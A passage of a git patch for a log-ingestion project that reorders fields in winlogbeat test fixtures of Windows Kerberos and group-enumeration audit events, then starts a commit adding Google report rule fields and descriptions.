l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json index 7b1f0f39d..ac4cdd94d 100644 --- a/Beats/winlogbeat/tests/security_event_4769.json +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json index b69049f3d..3e7783fbd 100644 --- a/Beats/winlogbeat/tests/security_event_4798.json +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", From 97df98680856146f65f7555985ef2764e75c5312 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 14:24:35 +0100 Subject: [PATCH 037/150] Add rules service --- Google Cloud/google-report/_meta/fields.yml | 25 +++++++++ .../_meta/smart-descriptions.json | 50 +++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 23 ++++++++ .../tests/test_rules_sample_1.json | 55 +++++++++++++++++++ .../tests/test_rules_sample_2.json | 55 +++++++++++++++++++ 5 files changed, 208 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_rules_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_rules_sample_2.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..fd683eea8 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,6 +33,31 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..9b88f06de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,56 @@ } ] }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": 